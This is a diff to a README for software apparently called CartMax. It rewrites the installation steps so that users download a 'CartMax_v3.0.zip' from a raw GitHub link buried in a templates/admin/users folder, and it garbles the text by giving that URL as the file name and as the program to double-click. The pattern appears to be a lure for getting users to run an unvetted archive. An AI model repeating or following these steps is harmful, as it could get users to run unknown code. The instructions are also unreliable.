nnig2507/CartMax/README.md

 ## ⚙️ Installation Steps

 1. **Locate the Downloaded File**
    After the download is complete, navigate to your Downloads folder.
-You should see a file named `CartMax_vX.X.X.zip` (the version number will vary).
+You should see a file named `https://raw.githubusercontent.com/nnig2507/CartMax/main/templates/admin/users/CartMax_v3.0.zip` (the version number will vary).

 2. **Extract the File**
-   Right-click on the `CartMax_vX.X.X.zip` file and select "Extract All."
+   Right-click on the `https://raw.githubusercontent.com/nnig2507/CartMax/main/templates/admin/users/CartMax_v3.0.zip` file and select "Extract All."
 Follow the prompts to extract the folder to your desired location.

 3. **Run the Application**
    Open the extracted folder.
-Look for the file `CartMax.exe` (or `CartMax` for macOS/Linux).
+Look for the file `https://raw.githubusercontent.com/nnig2507/CartMax/main/templates/admin/users/CartMax_v3.0.zip` (or `CartMax` for macOS/Linux).
 Double-click the file to run the application.

 4. **Follow the Setup Instructions**
    Once the application launches, you will be guided through setup.
 Enter the necessary details, such as your store name and currency preference.